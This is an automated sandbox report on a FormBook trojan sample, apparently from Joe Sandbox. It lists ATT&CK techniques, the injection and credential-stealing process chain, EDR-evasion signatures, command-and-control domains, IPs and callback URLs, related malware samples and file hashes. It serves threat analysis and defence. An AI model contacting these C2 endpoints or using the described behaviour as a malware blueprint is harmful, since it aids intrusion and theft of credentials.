Source: C:\Users\user\Desktop\VSP469620.exe; Code function: 2_2_00AE58C5 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset,2_2_00AE58C5
MITRE ATT&CK matrix, listed per tactic (the number in parentheses is the matched-signature count the matrix shows for that technique; techniques without a number had no match):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1561727; Sample: VSP469620.exe; Startdate: 24/11/2024; Architecture: WINDOWS; Score: 100

Start
  DNS/IP: www.heliopsis.xyz; www.aktmarket.xyz; 9 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 3 other signatures
  www.aktmarket.xyz: Performs DNS queries to domains with low reputation
  -> VSP469620.exe 2 (started)
     Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
     -> svchost.exe (started)
        Signatures: Maps a DLL or memory area into another process
        -> VgGNmkZfWSSE.exe (injected)
           Signatures: Found direct / indirect Syscall (likely to bypass EDR)
           -> icsunattend.exe 13 (started)
              Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
              -> VgGNmkZfWSSE.exe (injected)
                 DNS/IP: www.urbanxplore.info 209.74.77.108, ports 49991, 49992, 49993, MULTIBAND-NEWHOPEUS, United States; funnystory.online 172.104.82.74, ports 49853, 80, LINODE-APLinodeLLCUS, United States; 4 other IPs or domains
                 Signatures: Found direct / indirect Syscall (likely to bypass EDR)
              -> firefox.exe (started)

Source          Detection   Scanner          Label
VSP469620.exe   63%         ReversingLabs    Win32.Trojan.AutoitInject
VSP469620.exe   65%         Virustotal
VSP469620.exe   100%        Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
Source                 Detection   Scanner
www.nartex-uf.online   0%          Virustotal
www.aktmarket.xyz      1%          Virustotal
funnystory.online      0%          Virustotal
Source (URL)    Detection    Scanner    Label
http://www.aktmarket.xyz/4mbo/?9HaD=TaoaspSuXCWG+J6Qu2ekK1wrjY2r/s8nGO1Ev0B6QwWm63/Js3V07H2UbHrGJNHujJI3HhKgRchyd4beF5Q/e7/FZQPmwnmSAvyJ8G6Q9CuC8rAD3Q==&wdv4=1RD4    0%    Avira URL Cloud    safe
http://www.cssa.auction/bw18/?9HaD=shKGC8bK6vrLacDTgBZk6Rr0hJ1HgilraKgFYlsRqeuAlXFl2di5oGGCrfCVn8Xiw6EWTnMqBe6emh6gDO/8taYQfWAt8ESD/mKf9DNdyFPR+ujYTQ==&wdv4=1RD4    0%    Avira URL Cloud    safe
https://server194.hosting.reg.ru/manager    0%    Avira URL Cloud    safe
https://2domains.ru    0%    Avira URL Cloud    safe
http://www.nartex-uf.online/9ul0/    0%    Avira URL Cloud    safe
http://www.a1shop.shop/5cnx/    0%    Avira URL Cloud    safe
http://www.heliopsis.xyz/cclj/    0%    Avira URL Cloud    safe
https://files.reg.ru/fonts/inter/Inter-Medium.woff2)    0%    Avira URL Cloud    safe
https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)    0%    Avira URL Cloud    safe
https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)    0%    Avira URL Cloud    safe
http://www.funnystory.online/2dyu/?9HaD=bADo+7fqvlD2EEl6eQvhi6r6MxrwZqr7unPyaN6ymuSYop7wnq2+HbU7S+lsr3BB8s+/OWm3f+6bBn12YfZxgjGy6pWaqu2XlCfxhX0HPUcroLTQDQ==&wdv4=1RD4    0%    Avira URL Cloud    safe
http://www.aktmarket.xyz/4mbo/    0%    Avira URL Cloud    safe
https://files.reg.ru/fonts/inter/Inter-Medium.woff)    0%    Avira URL Cloud    safe
http://www.a1shop.shop/5cnx/?9HaD=oUaJUx3W91XKGFwkbiDYgYplg4TZBQwbgtCkXvgonjE8SHvx+U3TNstQnLVJ8Y9FFWXzakAfwSz/u1Ky3cg6+DtwGVYcLfdFQx5ESoBa74WqNsm9mQ==&wdv4=1RD4    0%    Avira URL Cloud    safe
https://files.reg.ru/fonts/inter/Inter-Regular.woff)    0%    Avira URL Cloud    safe
https://files.reg.ru/fonts/inter/Inter-Regular.woff2)    0%    Avira URL Cloud    safe
http://www.3kw40881107247y.click/stfe/?wdv4=1RD4&9HaD=ORqY22CcDufF1m336sq5Rb7ktLrp91WB7UJGYn2fYGIkb40HC4QAI0Uo1DAA/E2P6coBVsarHDRzXgtbaXIBPtY5QkEUWLhgXwOO0YSIlO9ptKaJ+w==    0%    Avira URL Cloud    safe
http://www.3kw40881107247y.click/stfe/    0%    Avira URL Cloud    safe
http://www.cssa.auction/bw18/    0%    Avira URL Cloud    safe
http://www.heliopsis.xyz/cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4    0%    Avira URL Cloud    safe
http://www.nartex-uf.online/9ul0/?9HaD=/8kciQFlGVV+s671hjTEMgvePijKoQKbVww8Emk+/ImbSDpFBlkIfEUbLp7Rr+tD2T8CwWTvaBp6p+1LgixmeT5OVDDglLmzebYBZGko1gl0UlPxFA==&wdv4=1RD4    0%    Avira URL Cloud    safe
http://www.heliopsis.xyz    0%    Avira URL Cloud    safe
http://funnystory.online/2dyu/?9HaD=bADo    0%    Avira URL Cloud    safe
Name                        IP              Active    Malicious   Antivirus Detection   Reputation
www.nartex-uf.online        31.31.196.177   true      true                              unknown
www.aktmarket.xyz           13.248.169.48   true      true                              unknown
funnystory.online           172.104.82.74   true      true                              unknown
www.urbanxplore.info        209.74.77.108   true      true                              unknown
www.heliopsis.xyz           13.248.169.48   true      true                              unknown
cssa.auction                107.167.84.42   true      true                              unknown
www.a1shop.shop             13.248.169.48   true      true                              unknown
www.3kw40881107247y.click   104.21.44.16    true      true                              unknown
www.mdpc7.top               unknown         unknown   false                             unknown
www.cssa.auction            unknown         unknown   false                             unknown
www.funnystory.online       unknown         unknown   false                             unknown
Name (URL)    Malicious    Antivirus Detection    Reputation
http://www.nartex-uf.online/9ul0/    true    Avira URL Cloud: safe    unknown
http://www.aktmarket.xyz/4mbo/?9HaD=TaoaspSuXCWG+J6Qu2ekK1wrjY2r/s8nGO1Ev0B6QwWm63/Js3V07H2UbHrGJNHujJI3HhKgRchyd4beF5Q/e7/FZQPmwnmSAvyJ8G6Q9CuC8rAD3Q==&wdv4=1RD4    true    Avira URL Cloud: safe    unknown
http://www.cssa.auction/bw18/?9HaD=shKGC8bK6vrLacDTgBZk6Rr0hJ1HgilraKgFYlsRqeuAlXFl2di5oGGCrfCVn8Xiw6EWTnMqBe6emh6gDO/8taYQfWAt8ESD/mKf9DNdyFPR+ujYTQ==&wdv4=1RD4    true    Avira URL Cloud: safe    unknown
http://www.a1shop.shop/5cnx/    true    Avira URL Cloud: safe    unknown
http://www.heliopsis.xyz/cclj/    true    Avira URL Cloud: safe    unknown
http://www.funnystory.online/2dyu/?9HaD=bADo+7fqvlD2EEl6eQvhi6r6MxrwZqr7unPyaN6ymuSYop7wnq2+HbU7S+lsr3BB8s+/OWm3f+6bBn12YfZxgjGy6pWaqu2XlCfxhX0HPUcroLTQDQ==&wdv4=1RD4    true    Avira URL Cloud: safe    unknown
http://www.aktmarket.xyz/4mbo/    true    Avira URL Cloud: safe    unknown
http://www.cssa.auction/bw18/    true    Avira URL Cloud: safe    unknown
http://www.3kw40881107247y.click/stfe/?wdv4=1RD4&9HaD=ORqY22CcDufF1m336sq5Rb7ktLrp91WB7UJGYn2fYGIkb40HC4QAI0Uo1DAA/E2P6coBVsarHDRzXgtbaXIBPtY5QkEUWLhgXwOO0YSIlO9ptKaJ+w==    true    Avira URL Cloud: safe    unknown
http://www.3kw40881107247y.click/stfe/    true    Avira URL Cloud: safe    unknown
http://www.a1shop.shop/5cnx/?9HaD=oUaJUx3W91XKGFwkbiDYgYplg4TZBQwbgtCkXvgonjE8SHvx+U3TNstQnLVJ8Y9FFWXzakAfwSz/u1Ky3cg6+DtwGVYcLfdFQx5ESoBa74WqNsm9mQ==&wdv4=1RD4    true    Avira URL Cloud: safe    unknown
http://www.heliopsis.xyz/cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4    true    Avira URL Cloud: safe    unknown
http://www.nartex-uf.online/9ul0/?9HaD=/8kciQFlGVV+s671hjTEMgvePijKoQKbVww8Emk+/ImbSDpFBlkIfEUbLp7Rr+tD2T8CwWTvaBp6p+1LgixmeT5OVDDglLmzebYBZGko1gl0UlPxFA==&wdv4=1RD4    true    Avira URL Cloud: safe    unknown
Name (URL) | Source | Malicious | Antivirus Detection | Reputation

Name: https://duckduckgo.com/chrome_newtab
  Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Reputation: high
Name: https://duckduckgo.com/ac/?q=
  Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Reputation: high
Name: https://files.reg.ru/fonts/inter/Inter-Medium.woff2)
  Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
Name: https://server194.hosting.reg.ru/manager
  Source: VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
Name: https://2domains.ru
  Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
Name: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
  Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Reputation: high
Name: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)
  Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
Name: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
  Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Reputation: high
Name: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)
  Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
Name: https://www.ecosia.org/newtab/
  Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Reputation: high
Name: https://www.reg.ru/support/#request
  Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false; Reputation: high
Name: https://ac.ecosia.org/autocomplete?q=
  Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Reputation: high
Name: https://files.reg.ru/fonts/inter/Inter-Regular.woff)
  Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
Name: https://files.reg.ru/fonts/inter/Inter-Medium.woff)
  Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
Name: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
  Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Reputation: high
Name: https://files.reg.ru/fonts/inter/Inter-Regular.woff2)
  Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
Name: http://www.heliopsis.xyz
  Source: VgGNmkZfWSSE.exe, 0000000A.00000002.3143475754.00000000011EA000.00000040.80000000.00040000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
Name: https://www.reg.ru/support/hosting-i-servery/moy-sayt-ne-rabotaet/oshibka-404
  Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false; Reputation: high
Name: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
  Source: icsunattend.exe, 00000007.00000002.3147151350.00000000076EE000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Reputation: high
Name: http://funnystory.online/2dyu/?9HaD=bADo
  Source: icsunattend.exe, 00000007.00000002.3145271641.0000000004F24000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.00000000030C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2115971735.0000000027284000.00000004.80000000.00040000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown
Name: https://reg.ru?target=_blank
  Source: icsunattend.exe, 00000007.00000002.3145271641.00000000050B6000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3144406739.0000000003256000.00000004.00000001.00040000.00000000.sdmp
  Malicious: false; Reputation: high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
IP              Domain                      Country              ASN      ASN Name               Malicious
13.248.169.48   www.aktmarket.xyz           United States        16509    AMAZON-02US            true
209.74.77.108   www.urbanxplore.info        United States        31744    MULTIBAND-NEWHOPEUS    true
104.21.44.16    www.3kw40881107247y.click   United States        13335    CLOUDFLARENETUS        true
31.31.196.177   www.nartex-uf.online        Russian Federation   197695   AS-REGRU               true
172.104.82.74   funnystory.online           United States        63949    LINODE-APLinodeLLCUS   true
107.167.84.42   cssa.auction                United States        53755    IOFLOODUS              true
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1561727
                                                      Start date and time:2024-11-24 08:11:42 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 9m 37s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Run name:Run with higher sleep bypass
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:VSP469620.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@7/3@14/6
                                                      EGA Information:
                                                      • Successful, ratio: 75%
                                                      HCA Information:
                                                      • Successful, ratio: 91%
                                                      • Number of executed functions: 54
                                                      • Number of non-executed functions: 294
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.248.169.48 | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | www.tals.xyz/cpgr/
13.248.169.48 | Mandatory Notice for all December Leave and Vacation application.exe | malicious | FormBook | www.tals.xyz/stx5/
13.248.169.48 | Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | malicious | FormBook | www.tals.xyz/k1td/
13.248.169.48 | DOC_114542366.vbe | malicious | FormBook | www.aiactor.xyz/x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq
13.248.169.48 | CV_ Filipa Barbosa.exe | malicious | FormBook | www.remedies.pro/hrap/
13.248.169.48 | SWIFT COPY 0028_pdf.exe | malicious | FormBook | www.optimismbank.xyz/lnyv/
13.248.169.48 | New Order - RCII900718_Contract Drafting.exe | malicious | FormBook | www.avalanchefi.xyz/ctta/
13.248.169.48 | need quotations.exe | malicious | FormBook | www.egldfi.xyz/3e55/
13.248.169.48 | Quotation request -30112024_pdf.exe | malicious | FormBook | www.tals.xyz/010v/
13.248.169.48 | Arrival Notice.exe | malicious | FormBook | www.wajf.net/dkz5/
209.74.77.108 | CV_ Filipa Barbosa.exe | malicious | FormBook | www.mindfulmo.life/grm8/
209.74.77.108 | Mandatory Notice for all December Leave and Vacation application.exe | malicious | FormBook | www.hobbihub.info/i5gf/
209.74.77.108 | CV_ Filipa Barbosa.exe | malicious | FormBook | www.mindfulmo.life/grm8/
31.31.196.177 | https://www.vulcnmold.com/cy/ | malicious | HTMLPhisher | 
31.31.196.177 | JoJbc8KfjQ.exe | malicious | DCRat | 
31.31.196.177 | 0eLsT7swLh.exe | malicious | DCRat | 
107.167.84.42 | Quotation request -30112024_pdf.exe | malicious | FormBook | www.cssa.auction/g4fs/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.3kw40881107247y.click | Quotation.exe | malicious | FormBook | 172.67.192.207
www.3kw40881107247y.click | payments.exe | malicious | FormBook | 172.67.192.207
www.a1shop.shop | SWIFT COPY 0028_pdf.exe | malicious | FormBook | 13.248.169.48
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 172.67.168.228
CLOUDFLARENETUS | Papyment_Advice.exe | malicious | MassLogger RAT | 104.21.67.152
CLOUDFLARENETUS | TAX INVOICE.exe | malicious | FormBook | 104.21.76.162
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 172.67.162.84
CLOUDFLARENETUS | file.exe | malicious | LummaC | 172.67.174.133
CLOUDFLARENETUS | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, Vidar | 104.21.74.61
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 172.67.162.84
CLOUDFLARENETUS | file.exe | malicious | LummaC | 172.67.160.80
CLOUDFLARENETUS | WC10SCPMaX.exe | malicious | Azorult, GuLoader | 172.67.165.138
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 104.21.33.116
AMAZON-02US | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 76.223.74.74
AMAZON-02US | arm7.nn.elf | malicious | Mirai, Okiru | 3.122.148.244
AMAZON-02US | arm5.nn.elf | malicious | Mirai, Okiru | 13.223.155.145
AMAZON-02US | sparc.nn.elf | malicious | Mirai, Okiru | 18.243.54.8
AMAZON-02US | arm.nn.elf | malicious | Mirai, Okiru | 15.206.178.249
AMAZON-02US | x86_32.nn.elf | malicious | Mirai, Okiru | 3.99.230.17
AMAZON-02US | file.exe | malicious | Amadey, Stealc, Vidar | 3.167.69.129
AMAZON-02US | arm7.nn.elf | malicious | Mirai, Okiru | 35.74.17.116
AMAZON-02US | sparc.nn.elf | malicious | Mirai, Okiru | 54.126.105.86
AMAZON-02US | arm.nn.elf | malicious | Mirai, Okiru | 44.226.3.74
AS-REGRU | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 194.58.112.174
AS-REGRU | Payroll List.exe | malicious | FormBook | 31.31.196.17
AS-REGRU | HXpVpoC9cr.exe | malicious | FormBook | 31.31.198.145
AS-REGRU | Delivery_Notification_00000207899.doc.js | malicious | Unknown | 194.58.112.173
AS-REGRU | F8TXbAdG3G.exe | malicious | CredGrabber, Meduza Stealer | 195.133.18.88
AS-REGRU | PROFORMA INVOICE.exe | malicious | FormBook | 31.31.196.17
AS-REGRU | Item-RQF-9456786.exe | malicious | Unknown | 194.58.112.174
AS-REGRU | PO AT-5228.exe | malicious | FormBook | 194.58.112.174
AS-REGRU | shipping doc_20241111.exe | malicious | FormBook | 194.58.112.174
AS-REGRU | file_1443.exe | malicious | DCRat, PureLog Stealer, zgRAT | 194.58.42.154
MULTIBAND-NEWHOPEUS | CV_ Filipa Barbosa.exe | malicious | FormBook | 209.74.77.108
MULTIBAND-NEWHOPEUS | Purchase Order PO.exe | malicious | FormBook | 209.74.77.107
MULTIBAND-NEWHOPEUS | PO #2411071822.exe | malicious | FormBook | 209.74.77.109
MULTIBAND-NEWHOPEUS | Quotation.exe | malicious | FormBook | 209.74.77.109
MULTIBAND-NEWHOPEUS | payments.exe | malicious | FormBook | 209.74.77.109
MULTIBAND-NEWHOPEUS | Mandatory Notice for all December Leave and Vacation application.exe | malicious | FormBook | 209.74.77.108
MULTIBAND-NEWHOPEUS | http://mt6j71.p1keesoulharmony.com/ | malicious | HTMLPhisher, EvilProxy | 209.74.95.101
MULTIBAND-NEWHOPEUS | CV_ Filipa Barbosa.exe | malicious | FormBook | 209.74.77.108
MULTIBAND-NEWHOPEUS | RFQ 3100185 MAHAD.exe | malicious | FormBook | 209.74.77.107
MULTIBAND-NEWHOPEUS | A2028041200SD.exe | malicious | FormBook | 209.74.77.109
No context
No context
Process: C:\Windows\SysWOW64\icsunattend.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1211596417522893
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
MD5: 0AB67F0950F46216D5590A6A41A267C7
SHA1: 3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
SHA-256: 4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
SHA-512: D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
Malicious: false
Reputation: moderate, very likely benign file
Preview: SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\VSP469620.exe
File Type: data
Category: dropped
Size (bytes): 288768
Entropy (8bit): 7.993425754498643
Encrypted: true
SSDEEP: 6144:f7a5+JbCu/g0r6xNH9eFGJ8sxyONXXO5S4VBGWPqZkfqPTCCu:f258Ou/gO0J9eg/BXniwWPbqLCJ
MD5: 273F9AF6EA744FC3D3F6A5457A7403F6
SHA1: 1CAF849FB6707A28B08B0E567B4453322AAF3987
SHA-256: 68336F1C58CC864332FEFD6B55C7CB8D797BEBCE9E491B2E15441434A125F30C
SHA-512: 191AE1E45FD022D962F919A9B7938AB64A7E41C6B5B5648F12429376AA2AA0C4F942161D52D2D9BCB2B4FBE0E6D4179C35B733E7763AD56EF1626F0575C85CEE
Malicious: false
Reputation: low
